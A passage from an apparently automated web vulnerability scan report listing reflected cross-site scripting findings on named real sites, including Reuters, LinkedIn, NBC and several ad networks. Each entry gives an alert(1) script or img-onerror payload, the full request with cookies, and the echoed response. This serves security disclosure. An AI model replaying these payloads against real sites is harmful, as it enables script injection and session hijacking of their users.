Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315097051_34024:68283:2:0:92_34024:68292:2:118888:118970_34023:68293:1:119601:119601; uid=1_1315097051_1314893682667:5756480826433243; kwd=1_1315097051; scg=1_1315097051; ppd=1_1315097051; act=1_1315097051

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:35 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315097675_1314893682667:57564808264332431; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:54:35 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 00:54:35 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 323

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68285&type=mrect3517f"-alert(1)-"f1d43df6b5a&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-15.3214998.3237979?url=' width='300' height='250' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

5.58. http://jlinks.industrybrains.com/jsct [ct parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jlinks.industrybrains.com
Path:	/jsct

Issue detail

The value of the ct request parameter is copied into the HTML document as plain text between tags. The payload c816f<script>alert(1)</script>a389a443772 was submitted in the ct parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=851&ct=REUTERS_INVESTINGc816f<script>alert(1)</script>a389a443772&tr=NEWS_MARKETS&num=4&layt=1&fmt=simp HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Connection: close
Date: Sun, 04 Sep 2011 00:47:52 GMT
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Sun, 04 Sep 2011 00:47:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 88

// Error: Unknown old section REUTERS_INVESTINGc816f<script>alert(1)</script>a389a443772

5.59. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jlinks.industrybrains.com
Path:	/jsct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4ad85<script>alert(1)</script>5f200bad0a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=851&ct=REUTERS_INVESTING&tr=NEWS_MARKETS&num=4&layt=1&fmt=simp&4ad85<script>alert(1)</script>5f200bad0a2=1 HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Connection: close
Date: Sun, 04 Sep 2011 00:47:56 GMT
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Sun, 04 Sep 2011 00:47:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 69

// Error: Unknown parameter 4ad85<script>alert(1)</script>5f200bad0a2

5.60. http://jlinks.industrybrains.com/jsct [tr parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jlinks.industrybrains.com
Path:	/jsct

Issue detail

The value of the tr request parameter is copied into the HTML document as plain text between tags. The payload ad4f4<script>alert(1)</script>7e2e605e666 was submitted in the tr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=851&ct=REUTERS_INVESTING&tr=NEWS_MARKETSad4f4<script>alert(1)</script>7e2e605e666&num=4&layt=1&fmt=simp HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Connection: close
Date: Sun, 04 Sep 2011 00:47:53 GMT
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Sun, 04 Sep 2011 00:47:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 87

// Error: Site 851 has no section NEWS_MARKETSad4f4<script>alert(1)</script>7e2e605e666

5.61. http://js.www.reuters.com/recommend/re/re [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://js.www.reuters.com
Path:	/recommend/re/re

Issue detail

The value of the callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload acc3f%3balert(1)//8f546b5d95b was submitted in the callback parameter. This input was echoed as acc3f;alert(1)//8f546b5d95b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /recommend/re/re?callback=Reuters.tns.updateRecommendationsacc3f%3balert(1)//8f546b5d95b&ed=us&u=9da0587b-a65b-4bca-a7de-c321e48d355a&refreshUrlTimestamp=1315097335859 HTTP/1.1
Host: js.www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; __qseg=Q_D|Q_T; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.2.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football; rsi_segs=I07714_10272|I07714_10273

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:02:46 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 04 Sep 2011 01:12:47 GMT
max-age: 600000
Content-Type: text/javascript;charset=UTF-8
Content-Length: 157

if (typeof Reuters.tns.updateRecommendationsacc3f;alert(1)//8f546b5d95b === 'function') {Reuters.tns.updateRecommendationsacc3f;alert(1)//8f546b5d95b([]);}

5.62. http://lingows.appspot.com/bubble/ [request_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://lingows.appspot.com
Path:	/bubble/

Issue detail

The value of the request_id request parameter is copied into the HTML document as plain text between tags. The payload 32dc1<img%20src%3da%20onerror%3dalert(1)>26594ea95cf was submitted in the request_id parameter. This input was echoed as 32dc1<img src=a onerror=alert(1)>26594ea95cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /bubble/?request_id=3_Sacbee32dc1<img%20src%3da%20onerror%3dalert(1)>26594ea95cf&respond_path=LINGO.connect&try=1&key=3_Sacbee&lm=1315604250000&url=http%3A//blogs.sacbee.com/the_state_worker/&title=Sacramento%20Bee%20--%20The%20State%20Worker HTTP/1.1
Host: lingows.appspot.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
content-type: text/javascript
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:07:29 GMT
Server: Google Frontend
Content-Length: 108

LINGO.connect.respond( {"status": "retry", "key": "3_Sacbee32dc1<img src=a onerror=alert(1)>26594ea95cf"} );

5.63. http://lingows.appspot.com/bubble/ [respond_path parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://lingows.appspot.com
Path:	/bubble/

Issue detail

The value of the respond_path request parameter is copied into the HTML document as plain text between tags. The payload 35685<script>alert(1)</script>490b8d7a6b2 was submitted in the respond_path parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bubble/?request_id=3_Sacbee&respond_path=LINGO.connect35685<script>alert(1)</script>490b8d7a6b2&try=1&key=3_Sacbee&lm=1315604250000&url=http%3A//blogs.sacbee.com/the_state_worker/&title=Sacramento%20Bee%20--%20The%20State%20Worker HTTP/1.1
Host: lingows.appspot.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
content-type: text/javascript
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:07:53 GMT
Server: Google Frontend
Content-Length: 105

LINGO.connect35685<script>alert(1)</script>490b8d7a6b2.respond( {"status": "retry", "key": "3_Sacbee"} );

5.64. http://lingows.appspot.com/content/LSXLXVUXQN/ [request_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://lingows.appspot.com
Path:	/content/LSXLXVUXQN/

Issue detail

The value of the request_id request parameter is copied into the HTML document as plain text between tags. The payload 9722d<script>alert(1)</script>4b38a362dd7 was submitted in the request_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/LSXLXVUXQN/?request_id=LSXLXVUXQN9722d<script>alert(1)</script>4b38a362dd7&respond_path=LINGO.connect&try=1&count=3&format=embed&mode=data&modified=1315604250000&url=http%3A//blogs.sacbee.com/the_state_worker/&width=300&title=Sacramento%20Bee%20--%20The%20State%20Worker HTTP/1.1
Host: lingows.appspot.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5905
content-type: text/javascript
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:07:38 GMT
Server: Google Frontend
Content-Length: 15633

LINGO.connect.respond( {"key": "LSXLXVUXQN9722d<script>alert(1)</script>4b38a362dd7", "status": 200, "quality": "good", "content": {"doc": "\n\n<table class='lingo_widget' style='width: 300;' cellspacing='0' cellpadding='0'>
...[SNIP]...

5.65. http://lingows.appspot.com/content/LSXLXVUXQN/ [respond_path parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://lingows.appspot.com
Path:	/content/LSXLXVUXQN/

Issue detail

The value of the respond_path request parameter is copied into the HTML document as plain text between tags. The payload fbbff<script>alert(1)</script>1d4f5de5d1c was submitted in the respond_path parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/LSXLXVUXQN/?request_id=LSXLXVUXQN&respond_path=fbbff<script>alert(1)</script>1d4f5de5d1c&try=1&count=3&format=embed&mode=data&modified=1315604250000&url=http%3A//blogs.sacbee.com/the_state_worker/&width=300&title=Sacramento%20Bee%20--%20The%20State%20Worker HTTP/1.1
Host: lingows.appspot.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5882
content-type: text/javascript
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:08:01 GMT
Server: Google Frontend
Content-Length: 15620

fbbff<script>alert(1)</script>1d4f5de5d1c.respond( {"key": "LSXLXVUXQN", "status": 200, "quality": "good", "content": {"doc": "\n\n<table class='lingo_widget' style='width: 300;' cellspacing='0' cellpadding='0'>
...[SNIP]...

5.66. http://lingows.appspot.com/content/ZXANLLFMOV/ [request_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://lingows.appspot.com
Path:	/content/ZXANLLFMOV/

Issue detail

The value of the request_id request parameter is copied into the HTML document as plain text between tags. The payload 16238<script>alert(1)</script>fe8c9be795c was submitted in the request_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/ZXANLLFMOV/?request_id=ZXANLLFMOV16238<script>alert(1)</script>fe8c9be795c&respond_path=LINGO.connect&try=1&format=embed&mode=data&modified=1315604250000&url=http%3A//blogs.sacbee.com/the_state_worker/&width=300&title=Sacramento%20Bee%20--%20The%20State%20Worker HTTP/1.1
Host: lingows.appspot.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5917
content-type: text/javascript
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:07:24 GMT
Server: Google Frontend
Content-Length: 18823

LINGO.connect.respond( {"key": "ZXANLLFMOV16238<script>alert(1)</script>fe8c9be795c", "status": 200, "quality": "good", "content": {"doc": "\n\n<table class='lingo_widget' style='width: 300;' cellspacing='0' cellpadding='0'>
...[SNIP]...

5.67. http://lingows.appspot.com/content/ZXANLLFMOV/ [respond_path parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://lingows.appspot.com
Path:	/content/ZXANLLFMOV/

Issue detail

The value of the respond_path request parameter is copied into the HTML document as plain text between tags. The payload 56500<script>alert(1)</script>339401737d was submitted in the respond_path parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/ZXANLLFMOV/?request_id=ZXANLLFMOV&respond_path=LINGO.connect56500<script>alert(1)</script>339401737d&try=1&format=embed&mode=data&modified=1315604250000&url=http%3A//blogs.sacbee.com/the_state_worker/&width=300&title=Sacramento%20Bee%20--%20The%20State%20Worker HTTP/1.1
Host: lingows.appspot.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5894
content-type: text/javascript
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:07:46 GMT
Server: Google Frontend
Content-Length: 18822

LINGO.connect56500<script>alert(1)</script>339401737d.respond( {"key": "ZXANLLFMOV", "status": 200, "quality": "good", "content": {"doc": "\n\n<table class='lingo_widget' style='width: 300;' cellspacing='0' cellpadding='0'>
...[SNIP]...

5.68. http://premium.mookie1.com/2/nbc.com/ac@Bottom3 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://premium.mookie1.com
Path:	/2/nbc.com/ac@Bottom3

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9d5c"><script>alert(1)</script>31deefb90e7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/nbc.comb9d5c"><script>alert(1)</script>31deefb90e7/ac@Bottom3 HTTP/1.1
Host: premium.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5iycEADA/r; NSC_o4_qsfnjvn_efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:19 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 339
Content-Type: text/html

<A HREF="http://premium.mookie1.com/RealMedia/ads/click_lx.ads/nbc.comb9d5c"><script>alert(1)</script>31deefb90e7/ac/1726311578/Bottom3/default/empty.gif/4d686437616b35697a42734143356436?x" target="_top">
...[SNIP]...

5.69. http://premium.mookie1.com/2/nbc.com/ac@Bottom3 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://premium.mookie1.com
Path:	/2/nbc.com/ac@Bottom3

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d2b6"><script>alert(1)</script>5b6781c6a22 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/nbc.com/ac@Bottom36d2b6"><script>alert(1)</script>5b6781c6a22 HTTP/1.1
Host: premium.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5iycEADA/r; NSC_o4_qsfnjvn_efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:28 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 330
Content-Type: text/html

<A HREF="http://premium.mookie1.com/RealMedia/ads/click_lx.ads/nbc.com/ac/664256000/Bottom36d2b6"><script>alert(1)</script>5b6781c6a22/default/empty.gif/4d686437616b35697a42734143356436?x" target="_top">
...[SNIP]...

5.70. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://snas.nbcuni.com
Path:	/snas/api/getRemoteDomainCookies

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 69220<script>alert(1)</script>530070fbb12 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback69220<script>alert(1)</script>530070fbb12 HTTP/1.1
Host: snas.nbcuni.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=C58B4400F3879E26517C8A2E3ECF06E2

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:47 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA_CP15 (build: CVSTag=https://svn.jboss.org/repos/jbossas/tags/JBoss_4_0_5_GA_CP15 date=200901081058)/Tomcat-5.5
Cache-Control: max-age=10
Expires: Sun, 04 Sep 2011 00:53:57 GMT
Content-Length: 172
Content-Type: text/html

__nbcsnasadops.doSCallback69220<script>alert(1)</script>530070fbb12({ "cookie":{"JSESSIONID":"C58B4400F3879E26517C8A2E3ECF06E2a8502<script>alert(1)</script>e55be4f7c60"}});

5.71. http://trc.taboolasyndication.com/reuters/trc/2/json [cb parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://trc.taboolasyndication.com
Path:	/reuters/trc/2/json

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload b735b<script>alert(1)</script>6863dfd174b was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /reuters/trc/2/json?tim=19%3A48%3A52.780&publisher=reuters&pv=2&list-size=3&list-id=rbox-t2v&id=500&uim=article&intent=s&uip=article&external=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F03%2Fus-weather-football-idUSTRE78222D20110903&llvl=1&item-id=USTRE78222D20110904&item-type=text&item-url=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F04%2Fus-weather-football-idUSTRE78222D20110904&page-id=7ec1fa180194eff20c8fb72aa34c5e7764c06279&sd=v1_cf5b371b2ea2c82fafb75969374381dc_ae7f02b7-d8fc-4e74-9744-efca878a3ea7_1315097030_1315097030&uid=ae7f02b7-d8fc-4e74-9744-efca878a3ea7&cv=4-8-2-1-48560-3339640&uiv=default&cb=TRC.callbacks.recommendations_1b735b<script>alert(1)</script>6863dfd174b HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: taboola_session_id=v1_cf5b371b2ea2c82fafb75969374381dc_ae7f02b7-d8fc-4e74-9744-efca878a3ea7_1315097030_1315097030; taboola_wv=; taboola_user_id=ae7f02b7-d8fc-4e74-9744-efca878a3ea7; JSESSIONID=.prod2-f3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Sun, 04 Sep 2011 01:03:12 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: taboola_session_id=v1_cf5b371b2ea2c82fafb75969374381dc_ae7f02b7-d8fc-4e74-9744-efca878a3ea7_1315097030_1315098192;Path=/reuters/
Set-Cookie: JSESSIONID=.prod2-f3;Path=/
Set-Cookie: taboola_wv=;Path=/reuters/;Expires=Mon, 03-Sep-12 01:03:12 GMT
Content-Length: 4004

TRC.callbacks.recommendations_1b735b<script>alert(1)</script>6863dfd174b({"trc":{"req":"62cd8c982855cc3f7a6f23b1340af084","session-id":"cf5b371b2ea2c82fafb75969374381dc","session-data":"v1_cf5b371b2ea2c82fafb75969374381dc_ae7f02b7-d8fc-4e74-9744-efca878a3ea7_1315097030_131
...[SNIP]...

5.72. http://www.linkedin.com/countserv/count/share [url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.linkedin.com
Path:	/countserv/count/share

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload c23af<img%20src%3da%20onerror%3dalert(1)>8205f4fbbb7 was submitted in the url parameter. This input was echoed as c23af<img src=a onerror=alert(1)>8205f4fbbb7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /countserv/count/share?url=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F04%2Fus-weather-football-idUSTRE78222D20110904c23af<img%20src%3da%20onerror%3dalert(1)>8205f4fbbb7 HTTP/1.1
Host: www.linkedin.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-LI-IDC=C1; bcookie="v=1&e6907e29-3b50-4659-95ed-c5124b8e731f"; visit=G; NSC_MC_WT_FU_IUUQ=ffffffffaf1994c945525d5f4f58455e445a4a42198d

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:58:54 GMT
Content-Length: 182

IN.Tags.Share.handleCount({"count":0,"url":"http:\/\/www.reuters.com\/article\/2011\/09\/04\/us-weather-football-idUSTRE78222D20110904c23af<img src=a onerror=alert(1)>8205f4fbbb7"});

5.73. http://www.publish2.com/newsgroups/state-worker.js [_ parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.publish2.com
Path:	/newsgroups/state-worker.js

Issue detail

The value of the _ request parameter is copied into the HTML document as plain text between tags. The payload aede9<a>fb44affacea was submitted in the _ parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /newsgroups/state-worker.js?jsonp_callback=jQuery15205311797398608178_1315097321812&_=1315097336789aede9<a>fb44affacea HTTP/1.1
Host: www.publish2.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:03:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
